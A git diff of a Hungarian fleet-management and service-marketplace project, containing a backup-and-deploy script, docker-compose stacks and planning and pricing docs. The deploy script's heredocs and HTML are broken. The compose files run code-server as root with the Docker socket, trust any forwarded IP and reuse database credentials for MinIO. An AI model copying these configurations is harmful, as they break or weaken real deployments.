13:38:57.146 [warning] RequestStore#acceptReply was called without receiving a matching request 189 +2026-01-22 13:38:57.146 [warning] RequestStore#acceptReply was called without receiving a matching request 190 +2026-01-22 13:38:57.146 [warning] RequestStore#acceptReply was called without receiving a matching request 191 +2026-01-22 13:38:57.146 [warning] RequestStore#acceptReply was called without receiving a matching request 192 +2026-01-22 13:38:57.147 [warning] RequestStore#acceptReply was called without receiving a matching request 193 +2026-01-22 13:38:57.147 [warning] RequestStore#acceptReply was called without receiving a matching request 194 +2026-01-22 13:38:57.147 [warning] RequestStore#acceptReply was called without receiving a matching request 195 +2026-01-22 13:38:57.147 [warning] RequestStore#acceptReply was called without receiving a matching request 196 +2026-01-22 13:38:57.147 [warning] RequestStore#acceptReply was called without receiving a matching request 197 +2026-01-22 13:38:57.147 [warning] RequestStore#acceptReply was called without receiving a matching request 198 +2026-01-22 14:29:52.297 [info] [172.21.0.6][a6ac9c9e][ManagementConnection] The client has disconnected gracefully, so the connection will be disposed. +2026-01-22 14:29:52.424 [info] [172.21.0.6][eef52a31][ExtensionHostConnection] <165828> Extension Host Process exited with code: 0, signal: null. +2026-01-22 19:12:26.734 [info] [192.168.100.179][02cd7240][ManagementConnection] New connection established. +2026-01-22 19:12:27.560 [info] [192.168.100.179][562ec859][ExtensionHostConnection] New connection established. +2026-01-22 19:12:27.568 [info] [192.168.100.179][562ec859][ExtensionHostConnection] <196294> Launched Extension Host Process. +2026-01-22 19:12:27.811 [info] [192.168.100.179][562ec859][ExtensionHostConnection] <196294> [reconnection-grace-time] Extension host: read VSCODE_RECONNECTION_GRACE_TIME=10800000ms (10800s) + diff --git a/code-server-config/extensions/extensions.json b/code-server-config/extensions/extensions.json new file mode 100755 index 0000000..0637a08 --- /dev/null +++ b/code-server-config/extensions/extensions.json @@ -0,0 +1 @@ +[] \ No newline at end of file diff --git a/deploy_v16.sh b/deploy_v16.sh new file mode 100755 index 0000000..dee7373 --- /dev/null +++ b/deploy_v16.sh @@ -0,0 +1,125 @@ +#!/bin/bash +# 🚀 SERVICE FINDER - SMART TILES & NAS BACKUP SCRIPT (V16.0) + +PROJECT_ROOT="/opt/service_finder" +NAS_BACKUP_PATH="/mnt/nas/app_data/backups" +TIMESTAMP=$(date +"%Y%m%d_%H%M%S") + +echo "--- 📦 1. BIZTONSÁGI MENTÉS KÉSZÍTÉSE A NAS-RA ---" +mkdir -p $NAS_BACKUP_PATH +# Mentés a NAS-ra a változtatások előtt +tar -czf $NAS_BACKUP_PATH/sf_backup_$TIMESTAMP.tar.gz -C $PROJECT_ROOT backend/app +echo "✅ Mentés elkészült: $NAS_BACKUP_PATH/sf_backup_$TIMESTAMP.tar.gz" + +echo "--- ⚙️ 2. VERZIÓ ÉS CHANGELOG FRISSÍTÉSE ---" +cat <> $PROJECT_ROOT/CHANGELOG.md +## [16.0] - 2026-01-25 +### Hozzáadva +- Smart Tiles: Csempe alapú nézet a Dashboardon. +- Brand logók és okmány-lejárat figyelmeztetések. +- Automata NAS mentés funkció a telepítőben. +EOF + +echo "--- 🧠 3. BACKEND FRISSÍTÉSE (fleet.py) ---" +cat < $PROJECT_ROOT/backend/app/api/v1/endpoints/fleet.py +from fastapi import APIRouter, Depends, HTTPException, status +from sqlalchemy.ext.asyncio import AsyncSession +from sqlalchemy import select, func +from typing import List +from app.db.session import get_db +from app.schemas.fleet import VehicleCreate, VehicleResponse, EventCreate, EventResponse +from app.models.vehicle import UserVehicle +from app.models.system_settings import SystemSetting +from app.models.vehicle_event import VehicleEvent +from app.api.deps import get_current_user +from app.models.user import User + +router = APIRouter() + +@router.get("/vehicles", response_model=List[VehicleResponse]) +async def get_my_vehicles(db: AsyncSession = Depends(get_db), current_user: User = Depends(get_current_user)): + result = await db.execute(select(UserVehicle).where(UserVehicle.user_id == current_user.id)) + return result.scalars().all() + +@router.post("/vehicles/{vehicle_id}/events", response_model=EventResponse) +async def create_event(vehicle_id: int, event_in: EventCreate, db: AsyncSession = Depends(get_db), current_user: User = Depends(get_current_user)): + v_query = await db.execute(select(UserVehicle).where(UserVehicle.id == vehicle_id, UserVehicle.user_id == current_user.id)) + vehicle = v_query.scalar_one_or_none() + if not vehicle: + raise HTTPException(status_code=404, detail="Jármű nem található.") + if event_in.odometer < vehicle.current_odometer: + raise HTTPException(status_code=400, detail=f"Hiba: Km állás ({event_in.odometer}) kevesebb mint {vehicle.current_odometer}") + new_event = VehicleEvent(**event_in.model_dump(), vehicle_id=vehicle_id) + db.add(new_event) + vehicle.current_odometer = event_in.odometer + await db.commit() + await db.refresh(new_event) + return new_event +EOF + +echo "--- 🎨 4. FRONTEND FRISSÍTÉSE (dashboard.html) ---" +cat < $PROJECT_ROOT/backend/app/static/dashboard.html + + + + Service Finder - Dashboard + + + + +
+
+

GARÁZS

+ +
+
+
+
+ + + + +EOF + +echo "--- 🔄 5. RENDSZER ÚJRAINDÍTÁSA ---" +docker compose restart service_finder_api +echo "🚀 FRISSÍTÉS ÉS NAS MENTÉS SIKERES!" diff --git a/docker-compose.yml b/docker-compose.yml new file mode 100755 index 0000000..cd45319 --- /dev/null +++ b/docker-compose.yml @@ -0,0 +1,107 @@ +services: + # 1. MIGRÁCIÓ (Adatbázis szerkezet frissítése) + migrate: + build: + context: ./backend + dockerfile: Dockerfile + container_name: service_finder_migrate + env_file: .env + volumes: + - ./backend:/app + - ./alembic.ini:/app/alembic.ini + - ./migrations:/app/migrations + environment: + PYTHONPATH: /app + DATABASE_URL: ${MIGRATION_DATABASE_URL} + command: ["bash", "-lc", "alembic upgrade head"] + networks: + - default # Hogy lássa a saját hálózatát + - shared_db_net # Hogy lássa a KÖZPONTI adatbázist! + restart: "no" + + # 2. BACKEND API + service_finder_api: + build: + context: ./backend + dockerfile: Dockerfile + container_name: service_finder_api + env_file: .env + volumes: + - ./backend:/app + - ./alembic.ini:/app/alembic.ini + - ./migrations:/app/migrations + # Fontos: A 0.0.0.0 host kell, hogy a Proxy elérje! + command: uvicorn app.main:app --host 0.0.0.0 --port 8000 --proxy-headers --forwarded-allow-ips="*" + ports: + - "8000:8000" + environment: + PYTHONPATH: /app + DATABASE_URL: ${DATABASE_URL} + ALLOWED_ORIGINS: ${ALLOWED_ORIGINS} + MINIO_ENDPOINT: ${MINIO_ENDPOINT} + MINIO_ROOT_USER: ${MINIO_ROOT_USER} + MINIO_ROOT_PASSWORD: ${MINIO_ROOT_PASSWORD} + depends_on: + migrate: + condition: service_completed_successfully + minio: + condition: service_started + redis: + condition: service_started + networks: + - default + - shared_db_net # <--- ITT KAPCSOLÓDIK A KÖZPONTHOZ + restart: unless-stopped + + # 3. MINIO (Lokális marad a projekthez, de NAS-ra ment) + minio: + image: minio/minio + container_name: service_finder_minio + env_file: .env + command: server /data --console-address ":9001" + environment: + MINIO_ROOT_USER: ${MINIO_ROOT_USER} + MINIO_ROOT_PASSWORD: ${MINIO_ROOT_PASSWORD} + volumes: + - /mnt/nas/app_data/minio_data:/data + ports: + - "9000:9000" + - "9001:9001" + networks: + - default + restart: unless-stopped + + # 4. REDIS (Gyorsítótár - Lokális marad) + redis: + image: redis:alpine + container_name: service_finder_redis + volumes: + - /mnt/nas/app_data/redis_data:/data + networks: + - default + restart: unless-stopped + + # 5. FRONTEND (Weboldal) + service_finder_frontend: + build: + context: ./frontend + container_name: service_finder_frontend + env_file: .env + ports: + - "3001:80" + environment: + ALLOWED_ORIGINS: ${ALLOWED_ORIGINS} + networks: + - default + depends_on: + service_finder_api: + condition: service_started + restart: unless-stopped + +# HÁLÓZATOK DEFINIÁLÁSA +networks: + default: + driver: bridge + # Ez a kulcs! Megmondjuk neki, hogy használja a már létező központi hálót: + shared_db_net: + external: true \ No newline at end of file diff --git a/docker-compose_2026.02.01.yml b/docker-compose_2026.02.01.yml new file mode 100755 index 0000000..96a0a58 --- /dev/null +++ b/docker-compose_2026.02.01.yml @@ -0,0 +1,176 @@ +services: + # 1. ADATBÁZIS + postgres-db: + image: postgres:15 + container_name: postgres-db + environment: + POSTGRES_USER: ${POSTGRES_USER} + POSTGRES_PASSWORD: ${POSTGRES_PASSWORD} + POSTGRES_DB: ${POSTGRES_DB} + volumes: + - ./postgres_data:/var/lib/postgresql/data + - ./postgres/init-db.sql:/docker-entrypoint-initdb.d/init-db.sql + ports: + - "${POSTGRES_PORT}:${POSTGRES_PORT}" + networks: + - service_finder_net + restart: unless-stopped + healthcheck: + test: ["CMD-SHELL", "pg_isready -U ${POSTGRES_USER} -d ${POSTGRES_DB}"] + interval: 5s + timeout: 5s + retries: 5 + + # 2. BACKEND API + service_finder_api: + build: + context: ./backend + dockerfile: Dockerfile + container_name: service_finder_api + volumes: + - ./backend:/app + - ./alembic.ini:/app/alembic.ini + - ./migrations:/app/migrations + command: uvicorn app.main:app --host 0.0.0.0 --port 8000 --proxy-headers --forwarded-allow-ips="*" + ports: + - "8000:8000" + environment: + - PYTHONPATH=/app + - DATABASE_URL=postgresql+asyncpg://${APP_DB_USER}:${APP_DB_PASSWORD}@postgres-db:5432/${APP_DB_NAME} + - SECRET_KEY=${SECRET_KEY} + - ALGORITHM=${ALGORITHM} + - ALLOWED_ORIGINS=https://dev.profibot.hu, + - MINIO_ENDPOINT=minio:9000 + - MINIO_ACCESS_KEY=${POSTGRES_USER} + - MINIO_SECRET_KEY=${POSTGRES_PASSWORD} + - SENDGRID_API_KEY=${SENDGRID_API_KEY} + - POSTGRES_USER=${POSTGRES_USER} + - POSTGRES_PASSWORD=${POSTGRES_PASSWORD} + - POSTGRES_DB=${POSTGRES_DB} + depends_on: + postgres-db: + condition: service_healthy + minio: + condition: service_started + redis: + condition: service_started + networks: + - service_finder_net + + # 3. PGADMIN + pgadmin: + image: dpage/pgadmin4 + container_name: pgadmin_ui + environment: + PGADMIN_DEFAULT_EMAIL: ${PGADMIN_EMAIL} + PGADMIN_DEFAULT_PASSWORD: ${PGADMIN_PASSWORD} + volumes: + - ./pgadmin_data:/var/lib/pgadmin + ports: + - "5050:80" + depends_on: + - postgres-db + networks: + - service_finder_net + + # 4. MINIO + minio: + image: minio/minio + container_name: service_finder_minio + command: server /data --console-address ":9001" + environment: + MINIO_ROOT_USER: ${POSTGRES_USER} + MINIO_ROOT_PASSWORD: ${POSTGRES_PASSWORD} + volumes: + - /mnt/nas/app_data/minio_data:/data + ports: + - "9000:9000" + - "9001:9001" + networks: + - service_finder_net + + # 5. REDIS + redis: + image: redis:alpine + container_name: service_finder_redis + volumes: + - /mnt/nas/app_data/redis_data:/data + networks: + - service_finder_net + + # 6. CODE-SERVER + code-server: + image: codercom/code-server:latest + container_name: code-server + user: "0:0" + volumes: + - /opt/service_finder:/opt/service_finder + - /var/run/docker.sock:/var/run/docker.sock + - /opt/service_finder/.vscode_config:/root + environment: + - PASSWORD=${CODE_SERVER_PASSWORD} + - TERM=xterm-256color + - TZ=Europe/Budapest + working_dir: /opt/service_finder + ports: + - "8443:8080" + restart: unless-stopped + networks: + - service_finder_net + # Ez a rész telepíti az eszközöket minden indításkor: + command: > + command: > + sh -c "apt-get update && + apt-get install -y ca-certificates curl gnupg mc python3 python3-pip htop && + install -m 0755 -d /etc/apt/keyrings && + curl -fsSL https://download.docker.com/linux/debian/gpg | gpg --dearmor -o /etc/apt/keyrings/docker.gpg && + chmod a+r /etc/apt/keyrings/docker.gpg && + echo \"deb [arch=$(dpkg --print-architecture) signed-by=/etc/apt/keyrings/docker.gpg] https://download.docker.com/linux/debian $(. /etc/os-release && echo \"$VERSION_CODENAME\") stable\" | tee /etc/apt/sources.list.d/docker.list > /dev/null && + apt-get update && + apt-get install -y docker-ce-cli && + dumb-init /usr/bin/code-server --bind-addr 0.0.0.0:8080 /opt/service_finder" + + # 7. NGINX PROXY MANAGER + nginx-proxy: + image: 'jc21/nginx-proxy-manager:latest' + container_name: nginx-proxy-manager + restart: unless-stopped + ports: + - '80:80' + - '81:81' + - '443:443' + volumes: + - ./proxy-manager/data:/data + - ./proxy-manager/letsencrypt:/etc/letsencrypt + networks: + - service_finder_net + + # 8. DOZZLE + dozzle: + image: amir20/dozzle:latest + container_name: dozzle + volumes: + - /var/run/docker.sock:/var/run/docker.sock + ports: + - "8888:8080" + restart: unless-stopped + networks: + - service_finder_net + + # 9. Frontend konténer + service_finder_frontend: + build: + context: ./frontend + container_name: service_finder_frontend + ports: + - "3000:80" + environment: + - ALLOWED_ORIGINS=https://app.profibot.hu, + networks: + - service_finder_net + depends_on: + - service_finder_api + +networks: + service_finder_net: + driver: bridge diff --git a/docs/1_PROJECT_BRAIN_FLEET.md b/docs/1_PROJECT_BRAIN_FLEET.md new file mode 100755 index 0000000..cb2cb26 --- /dev/null +++ b/docs/1_PROJECT_BRAIN_FLEET.md @@ -0,0 +1,305 @@ +# fő állapot + rendszerkép + +📄 1️⃣ PROJECT_BRAIN_FLEET.md + +(Flotta + költség + szerviz kereső – rendszerállapot) + +Projekt cél + +Flottakezelő és jármű-életciklus rendszer, amely kezeli: + +járműadatokat + +költségeket + +szerviz eseményeket + +ajánlatkérést / szerviz keresőt + +Fő modulok +Modul Leírás Státusz +Vehicle Registry Jármű nyilvántartás 🟡 audit alatt +Cost Tracking Költség / TCO / tankolás 🟡 audit alatt +Maintenance / Service Szerviz események 🟡 audit alatt +Evidence Számla / fotó / dokumentum 🟡 audit alatt +Provider Directory Szervizek adatbázisa 🔴 részben kész +Service Marketplace Ajánlatkérés 🔴 hiányzik +Reporting Kimutatások 🟡 alap kész +Auth / Tenant Jogosultság 🟢 alap kész +Docker / Infra Üzemeltetés 🟡 audit alatt + +🚀 Amit te építesz = PIACI RÉS + +A te célrendszered erősebb lenne, mint a fenti eszközök, ha tartalmazza: + +✅ Jármű TCO + költség + események +✅ Szerviz-ajánlatkérés (marketplace) +✅ Szervizek rangsorolása, hitelesítése +✅ Számla / fotó / km-óra / bizonyíték validáció +✅ Multi-tenant (cégek, magánszemélyek) +✅ API + mobil + AI +✅ EU-szintű többnyelvűség +✅ „Bank-szintű” audit trail +✅ Service Finder marketplace logika + +Ez Fleetio + Simply Fleet + Szerviz piactér + Trust Engine + Analytics egyben. + +Ha szeretnéd, készítek egy összehasonlító mátrixot +Funkció Fleetio SimplyFleet Wialon FMX Te rendszered +Költség ✅ ✅ ✅ ✅ 🚀 +Szerviz ✅ ✅ ⚠️ ✅ 🚀 +Ajánlat piactér ❌ ❌ ❌ ❌ 🚀 +Evidence ❌ ❌ ❌ ❌ 🚀 +Multi-tenant ⚠️ ⚠️ ⚠️ ⚠️ 🚀 + +🚗 Fleet / járműköltség / szerviz rendszerek – ár + tudás összehasonlítás +Platform Ármodell Induló ár Költség nyilvántartás Szerviz / karbantartás Work order Riport / elemzés Szerviz marketplace / ajánlat +Fleetio / jármű / hó $4–$10 / jármű / hó ✅ ✅ ✅ ✅ ❌ +Simply Fleet / jármű / hó $2–$4 / jármű / hó ✅ ✅ ⚠️ ✅ ❌ +Wialon / user / hó + GPS ~$150 / user / hó + HW ✅ ⚠️ ⚠️ ✅ ❌ +FMX / user / hó Egyedi ajánlat ⚠️ ✅ ✅ ⚠️ ❌ +Fiix CMMS / user / hó $45–$75 / user / hó ⚠️ ✅ ✅ ✅ ❌ +UpKeep / user / hó $20–$79 / user / hó ⚠️ ✅ ✅ ⚠️ ❌ +MaintainX / user / hó $20–$65 / user / hó ⚠️ ✅ ✅ ⚠️ ❌ +💰 Publikus árak – forrással +Fleetio + +Induló ár: $4 / jármű / hó (min. 5 jármű) +Felső csomag: $10 / jármű / hó + + +Simply Fleet + +Essential: $2 / jármű / hó +Advanced: $4 / jármű / hó +Min. $10–$20 / hó + + +Wialon + +Árazás tipikusan: +~$150 / user / hó + GPS hardver ($50–$300 / jármű) + + +(Telematika-centrikus, nem klasszikus fleet költség rendszer.) + +FMX Fleet Maintenance + +Egyedi ajánlat, / felhasználó / hó + + +Fiix CMMS + +$45–$75 / user / hó + + +UpKeep + +$20–$79 / user / hó + + +MaintainX + +$20–$65 / user / hó + + +🧠 Funkcionális érettség – mire jók valójában? +🟢 Fleetio – legjobb “fleet core” + +Erősség + +Költség, üzemanyag, TCO + +Szerviztörténet + +Work order + +Riport + API + +Hiány + +❌ NINCS szerviz piactér + +❌ NINCS ajánlatkérés több szerviztől + +❌ NINCS bizonyíték-validáció + +🟢 Simply Fleet – legjobb ár/érték + +Erősség + +Olcsó + +Költség + szerviz + +Mobilbarát + +Hiány + +❌ Marketplace + +❌ Komoly workflow + +⚠️ Limitált automatizmus + +🟡 Wialon – telematika & IoT fókusz + +Erősség + +GPS tracking + +Szenzorok + +Élő adatok + +Hiány + +❌ Gyenge költség logika + +❌ Nem szerviz-ajánlat platform + +🟠 FMX / CMMS rendszerek – maintenance fókusz + +Erősség + +Work order + +Karbantartás + +Eszközmenedzsment + +Hiány + +❌ Fleet-TCO gyenge + +❌ Marketplace nincs + +❌ Autós / motoros specializáció nincs + +🚨 Kritikus PIACI HIÁNY (és itt jössz te) + +Jelenleg NINCS olyan platform, ami egyszerre tudja: + +❌ Jármű költség + TCO +❌ Szerviz esemény + számla +❌ Ajánlatkérés több szerviztől (marketplace) +❌ Szervizek értékelése + validáció +❌ Bizonyíték-kezelés (fotó, km-óra, számla, proof) +❌ Multi-tenant (magánszemély + cég + flotta) +❌ EU-s többnyelvűség +❌ Audit trail / jogi bizonyíthatóság + +👉 Ez pontosan a te Service Finder / profibot irányod PIACI RÉS. + +1️⃣ Piaci árazási modellek – hogyan kérnek pénzt most? +A) Per jármű / hó (fleet-fókusz) + +Legelterjedtebb + +Rendszer Ár +Simply Fleet $2–$4 / jármű / hó +Fleetio $4–$10 / jármű / hó +Fleet Complete $8–$18 / jármű / hó +Verizon Fleet $15–$35 / jármű / hó + +Jellemző cél: KKV, flották +Skálázódik: járműszámmal + +B) Per user / hó (maintenance / CMMS) +Rendszer Ár +MaintainX $20–$65 / user / hó +Fiix CMMS $45–$75 / user / hó +UpKeep $20–$79 / user / hó + +Cél: szervizek, műhelyek +Nem ideális futároknak / magánszemélyeknek + +C) Telematika + hardware + SaaS (IoT) +Rendszer Ár +Wialon $150 / user / hó + GPS ($50–$300 / jármű) +Samsara $25–$35 / jármű / hó + HW + +Cél: enterprise +Belépési küszöb magas + +D) Marketplace / jutalék alapú (service platforms) +Modell Jellemző +Lead fee $2–$20 / ajánlat +Transaction fee 5–15% jutalék +Subscription + jutalék vegyes + +Ez a TE területed — itt van növekedési tér + +2️⃣ Valós piaci ársávok – összegezve +💸 Fleet SaaS reális ársáv +Szegmens Ár +Mikro / futár / magán $1–$3 / jármű / hó +KKV / kis flotta $3–$7 / jármű / hó +Közép flotta $7–$15 / jármű / hó +Enterprise $15–$35 / jármű / hó +3️⃣ Javasolt PROFIBOT / Service Finder árazási modell + +(Fleet + Marketplace + Evidence + Trust Engine) + +🟢 3 pillérű bevételi modell +① SaaS előfizetés (fleet core) +② Marketplace jutalék (szerviz ajánlatok) +③ Premium provider tagság (szervizeknek) +4️⃣ SaaS ár – jármű tulajdonosoknak / flottáknak +🚗 MAGÁNSZEMÉLY / FUTÁR +Csomag Ár Tartalom +Free 0 Ft 1 jármű, alap költség log +Basic 990 Ft / hó 1–3 jármű, riportok +Pro 2 490 Ft / hó full TCO, export, AI +🚚 KKV / KIS FLOTTA (5–30 jármű) +Csomag Ár +Starter 790 Ft / jármű / hó +Business 1 490 Ft / jármű / hó +Pro Fleet 2 490 Ft / jármű / hó +🚛 KÖZEPES / NAGY FLOTTA +Járműszám Ár +30–100 990–1 490 Ft / jármű / hó +100+ Egyedi ajánlat (~790 Ft / jármű / hó) +5️⃣ Marketplace jutalék (szerviz + ajánlat) +🔧 Szerviz oldal (provider fee) +Típus Jutalék +Alap ajánlat 8–12% +Prémium lead 5–7% +Kiemelt megjelenés havi 9 990–49 000 Ft +6️⃣ Szerviz prémium tagság (B2B bevétel) +Csomag Ár Extra +Free 0 Ft max 3 ajánlat / hó +Pro 19 990 Ft / hó unlimited ajánlat +Elite 49 990 Ft / hó kiemelt listing + analytics +7️⃣ Upsell bevételek (nagy profit) +Modul Ár +AI számla feldolgozás +490 Ft / hó / jármű +GPS / IoT integráció +990 Ft / hó / jármű +API / ERP export +9 990 Ft / hó +White-label +99 000 Ft / hó +8️⃣ Bevételi szimuláció (reális 2–3 évre) +Példa: + +3 000 aktív jármű +Átlagár: 1 200 Ft / hó + +→ 3.6 M Ft / hó SaaS +→ 43.2 M Ft / év + +Marketplace jutalék: +Ha 500 szerviz ügylet / hó, átlag 45 000 Ft / ügylet +Jutalék 8% = 1.8 M Ft / hó + +→ 21.6 M Ft / év + +Összesen: +👉 ~65 M Ft / év +(SKÁLÁZHATÓ) + +9️⃣ Stratégiai pozicionálás (piac vs TE) +Szereplő Ár Marketplace Evidence Fleet +Fleetio $$ ❌ ❌ ✅ +SimplyFleet $ ❌ ❌ ⚠️ +Te (Profibot) $$ ✅ ✅ ✅+ + +👉 TÖBB ÉRTÉK = tartható magasabb ár \ No newline at end of file diff --git a/docs/2_MODULE_STATUS_FLEET.md b/docs/2_MODULE_STATUS_FLEET.md new file mode 100755 index 0000000..fe27fdf --- /dev/null +++ b/docs/2_MODULE_STATUS_FLEET.md @@ -0,0 +1,29 @@ +# modulonkénti készültség + +📄 3️⃣ MODULE_STATUS_FLEET.md + +(Modulokra bontott készültségi térkép) + +Vehicle Registry +Funkció Státusz +Jármű létrehozás 🟡 +Műszaki adatok 🟡 +Tulajdonos / sofőr 🟡 +Dokumentumok 🟡 +Cost Tracking +Funkció Státusz +Tankolás rögzítés 🟡 +Egyéb költségek 🟡 +Számlák csatolása 🟡 +TCO számítás 🔴 +Maintenance / Service +Funkció Státusz +Szerviz esemény rögzítés 🟡 +Időzített karbantartás 🔴 +Work order 🔴 +Service Marketplace +Funkció Státusz +Szerviz lista 🟡 +Ajánlatkérés 🔴 +Ajánlatküldés 🔴 +Értékelés 🔴 \ No newline at end of file diff --git a/docs/3_IMPLEMENTED_FEATURES.md b/docs/3_IMPLEMENTED_FEATURES.md new file mode 100755 index 0000000..c53205a --- /dev/null +++ b/docs/3_IMPLEMENTED_FEATURES.md @@ -0,0 +1,179 @@ +# ami már kész + +✅ KÖLTSÉGKEZELÉS & PÉNZÜGY + +vehicle_expenses + +credit_logs + +credit_transactions + +credit_rules + +points_ledger + +user_credits + +vouchers + +billing endpointok aktívak + +➡️ Költségnyilvántartás DB szinten KÉSZ + +✅ SZERVIZKERESŐ & PROVIDER RÉTEG + +service_providers + +service_specialties + +service_reviews + +service_records + +organization_locations + +locations + +fuel_stations + +➡️ Szerviz- & provider alap KÉSZ + +✅ FELHASZNÁLÓK / ORG / AUTH + +users + +organizations + +organization_members + +company_members + +verification_tokens + +legal_acceptances + +legal_documents + +email_* + +➡️ Auth + org alap KÉSZ + +✅ KONFIG / RENDSZER MOTOR + +system_settings + +regional_settings + +subscription_tiers + +org_subscriptions + +subscription_notification_rules + +translations + +➡️ Hierarchikus config motor = HALADÓ SZINT + +🧠 GAMIFICATION / SCORING (extra — KÉSZ) + +badges + +user_badges + +votes + +user_scores + +user_stats + +level_configs + +point_rules + +Rendszer feltárása – 1. kör: mi tűnik késznek az API alapján? +Készen lévő funkciók (spec szerint) + +Auth (v1 + v2 vegyesen): + +v1: register, verify + +v2: register, login, forgot-password + +Billing (v1): + +balance, history, voucher generate/redeem + +Fleet & Vehicles (v1): + +fleet/vehicles + +vehicles/register + +vehicles/search/brands, vehicles/search/providers + +Expenses (v1): expenses/add + +Reports (v1): summary/{vehicle_id}, trends/{vehicle_id} + +User self endpoint (v1): users/me + +Health (root): / online/version + +Ami még bizonytalan (csak a specből nem derül ki) + +mely endpointok valójában működnek (spec ≠ implementáció kész) + +auth flow: v1 verify + v2 login együttélése (migráció alatt lehet) + +DB oldalon: mely táblák/sémák vannak ténylegesen, és mi a migrációs állapot + +Mit jelent ez “kész / nincs kész” szempontból? +Ami biztosan kész / működik + +API fut, van root health endpoint: / → online + version 2.0.0 + +Swagger UI működik: /docs + +Az API verziózott: api/v2/... + +DB fut és healthy (konténer szinten) + +Frontend fut (3000) + +Ami nincs kész / tisztázandó + +OpenAPI JSON pontos url-je: /api/v2/openapi.json (ezt le kell menteni) + +DB admin user / DB név / szerepkörök: a postgres user nem létezik → ki kell szedni a valódi POSTGRES_USER/DB-t + +Jogosultságok: postgres_data és pár volume folder root/egyéb owner → normális, de discovery-hez sudo kell + +Logolás: logs/ üres → lehet, hogy minden stdout-ba megy (Dozzle), vagy nincs file logging bekötve + +📄 2️⃣ IMPLEMENTED_FEATURES.md + +(Ami már MOST készen van – a te rendszered alapján kitöltjük majd) + +Core + +✅ PostgreSQL adatbázis + +✅ Docker alapú futtatás + +✅ Tenant-alapú logika (ha van) + +🟡 Járműtörzs (audit alatt) + +🟡 Költség rögzítés + +🟡 Szerviz esemény rögzítés + +UI / Backend + +🟡 API alap endpointok + +🔴 Service request workflow hiányzik + +🔴 Provider ajánlatküldés hiányzik + +(Amint elküldöd az anyagokat, ezt precízen feltöltöm.) \ No newline at end of file diff --git a/docs/4_BACKLOG_FLEET.md b/docs/4_BACKLOG_FLEET.md new file mode 100755 index 0000000..663a482 --- /dev/null +++ b/docs/4_BACKLOG_FLEET.md @@ -0,0 +1,31 @@ +# nyitott feladatok + +📄 4️⃣ BACKLOG_FLEET.md + +(Nyitott feladatok – fejlesztési lista) + +PRIORITÁS: KRITIKUS (MVP) + + Service Request MVP + + Provider ajánlat küldés + + Ajánlat elfogadás / státusz flow + + Szerviz értékelések + + TCO riport alap + +PRIORITÁS: FONTOS + + Szerviz kereső térképes listával + + Ár / idő összehasonlítás + + Automatizált szerviz emlékeztetők + +PRIORITÁS: KÉSŐBB + + Áralku / counter-offer + + Provider rangsorolás AI alapján \ No newline at end of file diff --git a/docs/5_TECH_DEBT_FLEET.md b/docs/5_TECH_DEBT_FLEET.md new file mode 100755 index 0000000..2ed49e7 --- /dev/null +++ b/docs/5_TECH_DEBT_FLEET.md @@ -0,0 +1,29 @@ +# javítandó / refaktor + +📄 5️⃣ TECH_DEBT_FLEET.md + +(Javítandó / optimalizálandó) + +DB + +Indexelés felülvizsgálata + +JSONB mezők optimalizálása + +Constraint hiányok + +Backend + +Endpoint naming egységesítése + +Service layer tisztítása + +Hibakezelési konzisztencia + +Infra + +Backup automatizálás ellenőrzése + +Secrets kezelés javítása + +Monitoring minimál rendszer \ No newline at end of file diff --git a/docs/6_ROADMAP_FLEET.md b/docs/6_ROADMAP_FLEET.md new file mode 100755 index 0000000..6d0550d --- /dev/null +++ b/docs/6_ROADMAP_FLEET.md @@ -0,0 +1,26 @@ +# ütemezés + +📄 6️⃣ ROADMAP_FLEET.md +Sprint 1 – Audit + Stabilizálás + +DB átnézés + +Modul státusz feltöltése + +Biztonsági hardening + +Sprint 2 – Marketplace MVP + +Service request flow + +Provider ajánlat + +Státusz pipeline + +Sprint 3 – Reporting & TCO + +Költségelemzés + +Export + +Dashboard \ No newline at end of file diff --git a/docs/AI üzemeltetése.md b/docs/AI üzemeltetése.md new file mode 100755 index 0000000..b38068d --- /dev/null +++ b/docs/AI üzemeltetése.md @@ -0,0 +1,910 @@ +1) Miben tudok “A–Z” szinten segíteni? +Architektúra és modulok + +modul felosztás (Fleet core, Costs, Maintenance, Service marketplace, Evidence, Auth, RBAC/RLS, Billing) + +domain modell (DDD-szerű bounded context-ek) + +adatfolyamok és API szerződések (OpenAPI/Swagger) + +multi-tenant izoláció (RLS/tenant context, audit trail) + +Adatbázis (PostgreSQL) + +DDL: táblák, indexek, constraint-ek, JSONB minták + +RLS policy-k, role-ok, session variablek (app.current_tenant_org_id stb.) + +trigger/function: audit log, esemény verziózás, evidence pipeline + +migrációs stratégia (Alembic/Flyway) + +Backend (pl. FastAPI / Django / Node – amit választasz) + +teljes endpoint készlet: auth, vehicles, costs, service requests, quotes, providers + +input validáció (Pydantic), hibakezelés, rate limit + +integrációk: email, push, storage (S3 kompatibilis), PDF számla feltöltés + +háttérfeladatok (Celery/RQ/BackgroundTasks) + +Frontend (MVP-től komoly UI-ig) + +admin + user felület (pl. React/Next.js) + +táblázatok, szűrés, kimutatások, export + +többnyelvűség UI szinten (i18n) + +jogosultság-alapú menük / oldalak + +Tesztelés, minőségbiztosítás + +unit/integration tesztek + +API contract teszt + +DB policy tesztek (RLS regresszió) + +lint/format/typing (ruff, mypy, eslint) + +threat model (OWASP-szemlélet) + +DevOps / Docker / CI + +docker-compose stack (db, backend, frontend, reverse proxy) + +env kezelés, secrets, backup + +GitHub Actions pipeline (build + test + deploy) + +log/monitoring (Prometheus/Grafana vagy egyszerűbb) + +2) Miben tudok segíteni kifejezetten “kódösszerakás + ellenőrzés” szinten? +✅ Kódírás + +modulonként elkészítem a teljes kódbázist (MVP és később skálázható formában) + +megadom a mappastruktúrát, futtatási parancsokat, dockerfile-t + +✅ Kódreview / hibakeresés + +ha bemásolod a logot / stack trace-t / hibás fájlt, pontosan megmondom mi a gond + +refaktor javaslatok + teljes patch (diff jelleggel) + +✅ Biztonság és adatkonzisztencia + +RLS policy-k ellenőrzése “nem lehet átszivárgás tenantok között” + +tranzakciók, idempotencia, race condition-ok kezelése + +input sanitization + file upload védelmek + +✅ Teljesítmény + +index terv, query optimalizálás + +slow query elemzés (ha adsz EXPLAIN-t / logot) + +3) Mi az, amit nem tudok “helyetted” megcsinálni? + +nem tudok belépni a szerveredre és “én telepítem” + +nem tudok valós bankkártyás fizetési szerződést / jogi megfelelést intézni + +nem tudok külső rendszerek API-jába belenyúlni hozzáférés nélkül + +De: lépésről lépésre leírom, és a parancsok 99%-át megírom neked. + +4) Javasolt működés, hogy gyors legyen és ne “lassuljon be” a projekt + +Mivel korábban írtad, hogy a túl nagy leírásnál lassult/pontatlan lett, ezért: + +“Szeleteljük” a 